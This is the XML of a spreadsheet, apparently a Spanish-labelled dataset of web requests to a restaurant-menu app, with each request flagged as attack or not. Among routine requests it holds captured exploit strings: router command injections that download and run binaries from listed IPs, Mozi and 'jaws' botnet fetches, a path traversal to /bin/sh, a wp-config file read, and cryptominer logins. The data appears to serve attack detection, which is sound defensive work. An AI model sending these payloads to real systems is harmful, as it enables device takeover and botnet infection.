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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1299" uniqueCount="320">
  <si>
    <t>CIBERATAQUE</t>
  </si>
  <si>
    <t>SOLICITUD</t>
  </si>
  <si>
    <t>GET /</t>
  </si>
  <si>
    <t>GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.15.222.150%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)</t>
  </si>
  <si>
    <t>CONNECT google.com:443 HTTP/1.1 Host: google.com:443 User-Agent: Go-http-client/1.1</t>
  </si>
  <si>
    <t>GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F93.123.85.153%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60)</t>
  </si>
  <si>
    <t>MGLNDD_217.216.172.218_80</t>
  </si>
  <si>
    <t>GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(id%3E%60wget+http%3A%2F%2F103.146.23.249%2Ft+-O-+|+sh%60)27;wget%20http://%s:%d/Mozi.m%20-O%20-&gt;%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0</t>
  </si>
  <si>
    <t>GET /boaform/admin/formLogin?username=ec8&amp;psd=ec8</t>
  </si>
  <si>
    <t>GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(id%3E%60wget+http%3A%2F%2F103.146.23.249%2Ft+-O-+|+sh%60)</t>
  </si>
  <si>
    <t>GET /hudson</t>
  </si>
  <si>
    <t>GET /druid/index.html</t>
  </si>
  <si>
    <t>GET /actuator/health</t>
  </si>
  <si>
    <t>PRI * HTTP/2.0 SM _x0018__x0004__x0002__x0004_Bh_x0006__x0004__x0003_</t>
  </si>
  <si>
    <t>PRI * HTTP/2.0 SM</t>
  </si>
  <si>
    <t>GET /geoserver/web/</t>
  </si>
  <si>
    <t>POST /Autodiscover/Autodiscover.xml</t>
  </si>
  <si>
    <t>POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>GET /solr/admin/info/system?wt=json</t>
  </si>
  <si>
    <t>GET /?XDEBUG_SESSION_START=phpstorm</t>
  </si>
  <si>
    <t>CONNECT pro.ip-api.com:443 HTTP/1.1 Host: pro.ip-api.com:443</t>
  </si>
  <si>
    <t>GET /console/</t>
  </si>
  <si>
    <t>GET /_ignition/execute-solution</t>
  </si>
  <si>
    <t>GET /actuator/gateway/routes</t>
  </si>
  <si>
    <t>GET /robots.txt</t>
  </si>
  <si>
    <t>GET /geoserver</t>
  </si>
  <si>
    <t>GET /manager/text/list</t>
  </si>
  <si>
    <t>GET /.env</t>
  </si>
  <si>
    <t>GET /static/historypage.js</t>
  </si>
  <si>
    <t>GET /WebInterface/</t>
  </si>
  <si>
    <t>GET /cgi-bin/authLogin.cgi</t>
  </si>
  <si>
    <t>GET /webfig/</t>
  </si>
  <si>
    <t>GET /sitecore/shell/sitecore.version.xml</t>
  </si>
  <si>
    <t>GET /api/session/properties</t>
  </si>
  <si>
    <t>GET /solr/</t>
  </si>
  <si>
    <t>GET /identity</t>
  </si>
  <si>
    <t>GET /sugar_version.json</t>
  </si>
  <si>
    <t>GET /index.jsp</t>
  </si>
  <si>
    <t>GET /zabbix/favicon.ico</t>
  </si>
  <si>
    <t>GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js</t>
  </si>
  <si>
    <t>GET /admin/</t>
  </si>
  <si>
    <t>GET /showLogin.cc</t>
  </si>
  <si>
    <t>GET /favicon-32x32.png</t>
  </si>
  <si>
    <t>GET /Telerik.Web.UI.WebResource.axd?type=rau</t>
  </si>
  <si>
    <t>GET /js/NewWindow_2_all.js</t>
  </si>
  <si>
    <t>POST /login</t>
  </si>
  <si>
    <t>GET /shell?cd+/tmp;rm+-rf+*;wget+ 188.130.251.44/jaws;sh+/tmp/jaws HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive</t>
  </si>
  <si>
    <t>GET /shell?cd+/tmp;rm+-rf+*;wget+45.128.232.15/jaws;sh+/tmp/jaws</t>
  </si>
  <si>
    <t>GET /boaform/admin/formLogin?username=adminisp&amp;psd=adminisp</t>
  </si>
  <si>
    <t>GET http://uplo.ad/?v=1&amp;ip=217.216.172.218&amp;port=80</t>
  </si>
  <si>
    <t>GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)</t>
  </si>
  <si>
    <t>POST /GponForm/diag_Form?images/</t>
  </si>
  <si>
    <t>GET /aaa9</t>
  </si>
  <si>
    <t>GET /aab8</t>
  </si>
  <si>
    <t>GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F185.142.238.35%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60)</t>
  </si>
  <si>
    <t>t3 12.1.2 AS:2048 HL:19</t>
  </si>
  <si>
    <t>GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F50.3.182.152%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)</t>
  </si>
  <si>
    <t>GET /sitemap.xml</t>
  </si>
  <si>
    <t>GET /.git/config</t>
  </si>
  <si>
    <t>GET /phpMyAdmin-latest/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /admin/phpMyAdmin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /_phpmyadmin_/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyAdmin5.1/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyAdmin-5.1.0/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyadmin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyAdmin-5/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /mysql/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /database/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /sql/webadmin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /db/phpmyadmin3/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyAdmin2/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /mysql/sqlmanager/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyAdmin-5.1.2/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyAdmin1/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /mysql/web/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /sql/sqladmin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /sql/phpMyAdmin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /sql/phpmy-admin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpmy-admin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpmyadmin2017/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyAdmin6.0/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /program/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /administrator/phpMyAdmin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /sql/sql/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /.most/nas_sharing.cgi?user=messagebus&amp;passwd=&amp;cmd=15&amp;system=cHMJfAlncmVwCW15ZGxpbms=</t>
  </si>
  <si>
    <t>GET /phpMyAdmin_/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpmyadmin2020/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /sql/php-myadmin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /sql/phpmanager/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /2phpmyadmin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /mysql/pMA/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /db/myadmin/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyAdmin6/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /administrator/db/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /PMA/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /phpMyAdmin-4/index.php?lang=en</t>
  </si>
  <si>
    <t>GET /sql/phpmyadmin5/index.php?lang=en</t>
  </si>
  <si>
    <t>POST /cgi-bin/tsaws.cgi</t>
  </si>
  <si>
    <t>GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.142.182.70%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)</t>
  </si>
  <si>
    <t>{'id': 1, 'method': 'mining.subscribe', 'params': [], 'jsonrpc':'2.0'}</t>
  </si>
  <si>
    <t>{'id': 1, 'jsonrpc': '2.0', 'method': 'login', 'params': { 'login': '48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD', 'pass': 'x', 'agent': 'XMRig/2.6.0-beta2 (Linux x86_64) libuv/1.8.0 gcc/5.4.0'}}</t>
  </si>
  <si>
    <t>{'id': 1, 'method': 'eth_submitLogin', 'params': []}</t>
  </si>
  <si>
    <t>{'id': 1, 'method': 'mining.subscribe', 'params': ['EthereumStratum/1.0.0']}</t>
  </si>
  <si>
    <t>{'id': 1, 'method': 'mining.hello', 'params': {'agent':'ethminer-0.17','host':'217.216.172.218', 'port':'50','proto':'EthereumStratum/2.0.0'}}</t>
  </si>
  <si>
    <t>_x0001__x0001__x0001_</t>
  </si>
  <si>
    <t>GET /cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(id%3E%60wget+http%3A%2F%2F103.163.215.239%2Ft+-O-+|+sh%60)</t>
  </si>
  <si>
    <t>GET /login</t>
  </si>
  <si>
    <t>GET /carta/carboneriaMedina/1</t>
  </si>
  <si>
    <t>GET /carta/root/1</t>
  </si>
  <si>
    <t>GET /dashboard</t>
  </si>
  <si>
    <t>GET /plato/3</t>
  </si>
  <si>
    <t>HEAD http://112.124.42.80:63435/ HTTP/1.1 Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 BS_REAL_IP: TmpBdU1Ua3hMakV5TlM0ek5RPT0= Host: 112.124.42.80:63435 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Proxy-Connection: keep-alive</t>
  </si>
  <si>
    <t>GET /.DS_Store</t>
  </si>
  <si>
    <t>GET //getCartas</t>
  </si>
  <si>
    <t>GET /getCartas</t>
  </si>
  <si>
    <t>GET /createCarta</t>
  </si>
  <si>
    <t>GET /carta/barManolo/23</t>
  </si>
  <si>
    <t>GET /secciones</t>
  </si>
  <si>
    <t>GET /secciones/desayuno</t>
  </si>
  <si>
    <t>GET /plato</t>
  </si>
  <si>
    <t>GET /plato/0wget+http%3A%2F%2F103.163.215.239%2Ft+-O-+%7C+sh%60</t>
  </si>
  <si>
    <t>GET /pedido</t>
  </si>
  <si>
    <t>GET /pedidoFin</t>
  </si>
  <si>
    <t>GET /pedido?X_debugsesion</t>
  </si>
  <si>
    <t>GET /gestion</t>
  </si>
  <si>
    <t>GET /platos/queso</t>
  </si>
  <si>
    <t>GET /getPlatos</t>
  </si>
  <si>
    <t>GET /register</t>
  </si>
  <si>
    <t>GET /confirm/luiis02</t>
  </si>
  <si>
    <t>GET /confirm/juanito</t>
  </si>
  <si>
    <t>GET /cierresesion</t>
  </si>
  <si>
    <t>GET /static/js/carrito.js</t>
  </si>
  <si>
    <t>GET /static/js/carta.js</t>
  </si>
  <si>
    <t>GET /static/MwsSF1MO.txt</t>
  </si>
  <si>
    <t>POST /removePlato</t>
  </si>
  <si>
    <t>GET /getSeccion</t>
  </si>
  <si>
    <t>GET /mesa</t>
  </si>
  <si>
    <t>POST /confirm/lC3DkSxs</t>
  </si>
  <si>
    <t>POST /mail</t>
  </si>
  <si>
    <t>POST /gestion</t>
  </si>
  <si>
    <t>GET /static/WV1Ljmxk.txt</t>
  </si>
  <si>
    <t>GET /deleteMesa</t>
  </si>
  <si>
    <t>POST /editCarta</t>
  </si>
  <si>
    <t>POST /platos/4eyrRXdk</t>
  </si>
  <si>
    <t>POST /removeCarta</t>
  </si>
  <si>
    <t>POST /createCarta</t>
  </si>
  <si>
    <t>POST /editPlato</t>
  </si>
  <si>
    <t>POST /platos/2vHch7W6</t>
  </si>
  <si>
    <t>POST /carta/SamPQfqu</t>
  </si>
  <si>
    <t>POST /editSeccion</t>
  </si>
  <si>
    <t>POST /mesa</t>
  </si>
  <si>
    <t>POST /deleteMesa</t>
  </si>
  <si>
    <t>GET /plato/JjmP7NYv</t>
  </si>
  <si>
    <t>POST /getMesa</t>
  </si>
  <si>
    <t>POST /createMesa</t>
  </si>
  <si>
    <t>POST /confirm/8rPJbIbx</t>
  </si>
  <si>
    <t>POST /createSeccion</t>
  </si>
  <si>
    <t>POST /confirm/eprEImpH</t>
  </si>
  <si>
    <t>GET /secciones/VeI7peTR</t>
  </si>
  <si>
    <t>POST /carta/WWqhleEr</t>
  </si>
  <si>
    <t>POST /platos/6FdXqo2h</t>
  </si>
  <si>
    <t>GET /getMesa</t>
  </si>
  <si>
    <t>POST /pedido</t>
  </si>
  <si>
    <t>GET /platos/BubOntIg</t>
  </si>
  <si>
    <t>POST /register</t>
  </si>
  <si>
    <t>GET /carta/K1TRckHv/PJlkHN6e</t>
  </si>
  <si>
    <t>POST /platos/3TVOzAs7</t>
  </si>
  <si>
    <t>GET /secciones/N3YX568z</t>
  </si>
  <si>
    <t>GET /confirm/oVtHNdJS</t>
  </si>
  <si>
    <t>POST /confirm/bfGn3rB2</t>
  </si>
  <si>
    <t>GET /secciones/BCNwin1P</t>
  </si>
  <si>
    <t>POST /removeSeccion</t>
  </si>
  <si>
    <t>GET /confirm/hYSVecCk</t>
  </si>
  <si>
    <t>GET /carta</t>
  </si>
  <si>
    <t>GET /confirm/Ea65KuZL</t>
  </si>
  <si>
    <t>POST /createPlato</t>
  </si>
  <si>
    <t>GET /static/zKYlfB0e.txt</t>
  </si>
  <si>
    <t>POST /platos/nbzxklYZ</t>
  </si>
  <si>
    <t>GET /secciones/UhYOnt2B</t>
  </si>
  <si>
    <t>POST /platos/yqXip6gq</t>
  </si>
  <si>
    <t>GET /portal/redlion</t>
  </si>
  <si>
    <t>GET /.vscode/sftp.json</t>
  </si>
  <si>
    <t>GET /Temporary_Listen_Addresses</t>
  </si>
  <si>
    <t>GET /Pages/log/</t>
  </si>
  <si>
    <t>GET /shell?cd+/tmp;rm+-rf+*;wget+ 192.52.167.197/jaws;sh+/tmp/jaws HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive</t>
  </si>
  <si>
    <t>CONNECT www.google.com:443 HTTP/1.1 Host: www.google.com:443 User-Agent: Go-http-client/1.1</t>
  </si>
  <si>
    <t>POST /boaform/admin/formLogin</t>
  </si>
  <si>
    <t>POST /</t>
  </si>
  <si>
    <t>OPTIONS / HTTP/1.0</t>
  </si>
  <si>
    <t>OPTIONS / RTSP/1.0</t>
  </si>
  <si>
    <t>l</t>
  </si>
  <si>
    <t>GET /nice%20ports%2C/Tri%6Eity.txt%2ebak</t>
  </si>
  <si>
    <t>_x0006__x0001__x0001__x0007_version_x0004_bind_x0010__x0003_</t>
  </si>
  <si>
    <t>_x0010_</t>
  </si>
  <si>
    <t>HELP</t>
  </si>
  <si>
    <t>_x0001_default</t>
  </si>
  <si>
    <t>OPTIONS sip:nm SIP/2.0 Via: SIP/2.0/TCP nm;branch=foo From: ;tag=root To: Call-ID: 50000 CSeq: 42 OPTIONS Max-Forwards: 70 Content-Length: 0 Contact: Accept: application/sdp</t>
  </si>
  <si>
    <t>TNMP_x0004_TNME_x0004_</t>
  </si>
  <si>
    <t>:/_x0002_@_x0002__x000f__x0001_=_x0005_/@</t>
  </si>
  <si>
    <t>JRMI_x0002_K</t>
  </si>
  <si>
    <t>_x0003__x0001__x0002__x000f_</t>
  </si>
  <si>
    <t>GET /odinhttpcall1716535813</t>
  </si>
  <si>
    <t>GET /HNAP1</t>
  </si>
  <si>
    <t>GET /OdinHttpCall1716535813</t>
  </si>
  <si>
    <t>GET /Odin/http/call1716535813</t>
  </si>
  <si>
    <t>GET /v2/_catalog</t>
  </si>
  <si>
    <t>GET /query?q=SHOW+DIAGNOSTICS</t>
  </si>
  <si>
    <t>GET /ReportServer</t>
  </si>
  <si>
    <t>GET /solr/admin/info/system</t>
  </si>
  <si>
    <t>GET /solr/admin/cores?action=STATUS&amp;wt=json</t>
  </si>
  <si>
    <t>GET /manager/html</t>
  </si>
  <si>
    <t>GET /static/spS2Mu06.txt</t>
  </si>
  <si>
    <t>POST /platos/CQgaYixT</t>
  </si>
  <si>
    <t>GET /plato/xzaKbTyP</t>
  </si>
  <si>
    <t>GET /secciones/w99EsTiR</t>
  </si>
  <si>
    <t>GET /carta/CbRHEBxc/x0AOAEFG</t>
  </si>
  <si>
    <t>POST /confirm/jubaEv8g</t>
  </si>
  <si>
    <t>GET /plato/sBdCuOop</t>
  </si>
  <si>
    <t>GET /plato/JBNJhE0W</t>
  </si>
  <si>
    <t>GET /secciones/XQ3KEtzm</t>
  </si>
  <si>
    <t>GET /index.php</t>
  </si>
  <si>
    <t>GET /change-password?newpassword=hacked</t>
  </si>
  <si>
    <t>GET /wp-admin/admin-ajax.php?action=revslider_show_image&amp;img=../../wp-config.php</t>
  </si>
  <si>
    <t>GET /static/6NhNppNA.png</t>
  </si>
  <si>
    <t>GET /confirm/KstPNicc</t>
  </si>
  <si>
    <t>GET /static/qolIIaJe.jpg</t>
  </si>
  <si>
    <t>GET /plato/1lCOyA7w</t>
  </si>
  <si>
    <t>POST /confirm/rJU1N9Ve</t>
  </si>
  <si>
    <t>POST /platos/8ERjHaFy</t>
  </si>
  <si>
    <t>GET /carta/FwshAMHa</t>
  </si>
  <si>
    <t>POST /carta/fZJWC7AJ</t>
  </si>
  <si>
    <t>POST /platos/TJjgzNy5</t>
  </si>
  <si>
    <t>GET /platos/wjP4Gfph</t>
  </si>
  <si>
    <t>GET /platos/R8Mtd9HH</t>
  </si>
  <si>
    <t>GET /carta/FabYAXtS</t>
  </si>
  <si>
    <t>GET /platos/djffG1hR</t>
  </si>
  <si>
    <t>GET /secciones/Gwzgbwra</t>
  </si>
  <si>
    <t>GET /platos/zyTbV3U5</t>
  </si>
  <si>
    <t>GET /confirm/KUtCtPN7</t>
  </si>
  <si>
    <t>GET /carta/nL2Er7ta/9uTpOIPj</t>
  </si>
  <si>
    <t>POST /confirm/nN48q0kP</t>
  </si>
  <si>
    <t>POST /platos/oPII2D4N</t>
  </si>
  <si>
    <t>GET /secciones/OqQab2uP</t>
  </si>
  <si>
    <t>GET /carta/XnNCDeAE/AghKzhUe</t>
  </si>
  <si>
    <t>GET /confirm/B66Vhd5X</t>
  </si>
  <si>
    <t>GET /confirm/gC0gRbzD</t>
  </si>
  <si>
    <t>POST /confirm/vQXFLeXV</t>
  </si>
  <si>
    <t>GET /plato/vwrrAYYw</t>
  </si>
  <si>
    <t>GET /plato/HBSEtcOr</t>
  </si>
  <si>
    <t>GET /secciones/y2j60O2S</t>
  </si>
  <si>
    <t>GET /carta/gWkFE9cv/QOcKQXHP</t>
  </si>
  <si>
    <t>POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh</t>
  </si>
  <si>
    <t>GET /cgi/conf.bin</t>
  </si>
  <si>
    <t>USER anonymous</t>
  </si>
  <si>
    <t>GET /.well-known/security.txt</t>
  </si>
  <si>
    <t>_x0005__x0001_</t>
  </si>
  <si>
    <t>GET /carta/C21UAwRb/DvBkqYvI</t>
  </si>
  <si>
    <t>GET /carta/SQG4ypSw/RHYBdaM2</t>
  </si>
  <si>
    <t>GET /carta/hoSgFcej/h5d79t7g</t>
  </si>
  <si>
    <t>POST /confirm/GcnyGLxi</t>
  </si>
  <si>
    <t>GET /secciones/obzxgKZQ</t>
  </si>
  <si>
    <t>GET /carta/EhR8Qhqh/IT1WKwH8</t>
  </si>
  <si>
    <t>GET /static/p5zDJJKr.pdf</t>
  </si>
  <si>
    <t>POST /carta/Wz7noJNW</t>
  </si>
  <si>
    <t>GET /secciones/GgRkRJXf</t>
  </si>
  <si>
    <t>GET /confirm/zuNygrHm</t>
  </si>
  <si>
    <t>GET /confirm/HpdaDjzZ</t>
  </si>
  <si>
    <t>POST /platos/b262ZWAV</t>
  </si>
  <si>
    <t>GET /static/S3zflsPm.txt</t>
  </si>
  <si>
    <t>POST /confirm/sLUrRoQ3</t>
  </si>
  <si>
    <t>GET /plato/mC5PrBgi</t>
  </si>
  <si>
    <t>POST /carta/yTIBEDz2</t>
  </si>
  <si>
    <t>GET /secciones/6A3pTe7i</t>
  </si>
  <si>
    <t>GET /carta/LGSN5N0c</t>
  </si>
  <si>
    <t>POST /confirm/lBK7UB7q</t>
  </si>
  <si>
    <t>GET /secciones/WZZ5qNCE</t>
  </si>
  <si>
    <t>GET /secciones/kDgAiRII</t>
  </si>
  <si>
    <t>POST /carta/PslYMELz</t>
  </si>
  <si>
    <t>GET /confirm/uI1SNjys</t>
  </si>
  <si>
    <t>GET /platos/KnqM77Kl</t>
  </si>
  <si>
    <t>GET /secciones/dAJh00QV</t>
  </si>
  <si>
    <t>POST /platos/xo9AwrYU</t>
  </si>
  <si>
    <t>POST /platos/M1aR9qRN</t>
  </si>
  <si>
    <t>POST /confirm/7wkVsdui</t>
  </si>
  <si>
    <t>GET /secciones/tPGVoYEF</t>
  </si>
  <si>
    <t>GET /carta/JAQvsbxo</t>
  </si>
  <si>
    <t>GET /carta/fDBJ7pFP</t>
  </si>
  <si>
    <t>GET /confirm/9HUfBewx</t>
  </si>
  <si>
    <t>GET /carta/QzH6WRwY</t>
  </si>
  <si>
    <t>GET /confirm/MA4H3EmI</t>
  </si>
  <si>
    <t>GET /confirm/94CezZTM</t>
  </si>
  <si>
    <t>POST /carta/9pccBkzh</t>
  </si>
  <si>
    <t>GET /static/hhYTSkwg.txt</t>
  </si>
  <si>
    <t>GET /carta/jWpKJcYG/WuDbVDNm</t>
  </si>
  <si>
    <t>GET /platos/rBYS0TUI</t>
  </si>
  <si>
    <t>POST /carta/gU1DzkNi</t>
  </si>
  <si>
    <t>GET /plato/pVoBHRYs</t>
  </si>
  <si>
    <t>GET /confirm/2BGGm1RE</t>
  </si>
  <si>
    <t>POST /platos/H2NPONGi</t>
  </si>
  <si>
    <t>GET /carta/xmcTWjqG</t>
  </si>
  <si>
    <t>GET /platos/66vmR3Ro</t>
  </si>
  <si>
    <t>GET /carta/lGTvPDCR/IxppVSCB</t>
  </si>
  <si>
    <t>GET /platos/LgQDUxfl</t>
  </si>
  <si>
    <t>GET /confirm/u2tGWUtb</t>
  </si>
  <si>
    <t>GET /secciones/Yg1xvTAQ</t>
  </si>
  <si>
    <t>CONNECT i0.hdslb.com:80 HTTP/1.1 Host: i0.hdslb.com:80 Proxy-Connection: Keep-Alive</t>
  </si>
  <si>
    <t>{'id': 1, 'method': 'mining.subscribe', 'params': ['cpuminer/2.5.1']}</t>
  </si>
  <si>
    <t>{'id': 1, 'method': 'mining.subscribe', 'params': ['MinerName/1.0.0', 'EthereumStratum/1.0.0']}</t>
  </si>
  <si>
    <t>{'id':1,'method':'eth_submitLogin','worker':'igwrcvap','params':['0x8d4d09cc9b14e3f885e7e8cc81c9272124e8abed','x'],'jsonrpc':'2.0'}</t>
  </si>
  <si>
    <t>{'id':1,'jsonrpc':'2.0','method':'login','params':{'login':'4275urX4rbV2RDfnSQSgEZUPpBcnmDX9VfQrtw43qQ2sLCRTB3mNtxu44SsMyNa2XnKMspXsNCmbKZ3WtAEfLBShU5Zpyyc','pass':'x','agent':'XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019','algo':['cn/1','cn/2','cn/r','cn/fast','cn/half','cn/xao','cn/rto','cn/rwz','cn/zls','cn/double','cn/ccx','cn-lite/1','cn-heavy/0','cn-heavy/tube','cn-heavy/xhv','cn-pico','cn-pico/tlo','cn/upx2','rx/0','rx/wow','rx/arq','rx/graft','rx/sfx','rx/keva','argon2/chukwa','argon2/chukwav2','argon2/ninja','astrobwt']}}</t>
  </si>
  <si>
    <t>GET /WuEL</t>
  </si>
  <si>
    <t>GET stager64</t>
  </si>
  <si>
    <t>GET /a</t>
  </si>
  <si>
    <t>GET /download/file.ext</t>
  </si>
  <si>
    <t>GET /SiteLoader</t>
  </si>
  <si>
    <t>GET /mPlayer</t>
  </si>
  <si>
    <t>GET http://192.168.1.2:8000/</t>
  </si>
  <si>
    <t>OPTIONS / HTTP/1.1 Host: apuntajefe.tplinkdns.com User-Agent: curl/8.4.0 Content-Length: 0 Accept: application/sdp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</si>
</sst>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&quot;Times New Roman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</row>
    <row r="2">
      <c r="A2" s="2"/>
      <c r="B2" s="3" t="str">
        <f t="shared" ref="B2:B1299" si="1">IF(A2=1,"si","no")</f>
        <v>no</v>
      </c>
      <c r="C2" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5">
        <v>1.0</v>
      </c>
      <c r="B3" s="3" t="str">
        <f t="shared" si="1"/>
        <v>si</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="4">
      <c r="B4" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C4" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="5">
      <c r="B5" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="6">
      <c r="B6" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C6" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="7">
      <c r="B7" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="8">
      <c r="B8" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C8" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="9">
      <c r="B9" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C9" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="10">
      <c r="B10" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C10" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="11">
      <c r="B11" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C11" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="12">
      <c r="B12" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C12" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="13">
      <c r="B13" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C13" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="14">
      <c r="B14" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C14" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="15">
      <c r="B15" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C15" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="16">
      <c r="B16" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C16" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="17">
      <c r="B17" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="18">
      <c r="B18" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C18" s="4" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="19">
      <c r="B19" s="3" t="str">
        <f t="shared" si="1"/>
        <v>no</v>
      </c>
      <c r="C19" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5">
        <v>1.0</v>
      </c>
      <c r="B20" s="3" t="str">
        <f t="shared" si="1"/>
        <v>si</v>
      </c>
      <c r="C20" s="4" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5">
        <v>1.0</v>
      </c>
      <c r="B21" s="3" t="str">
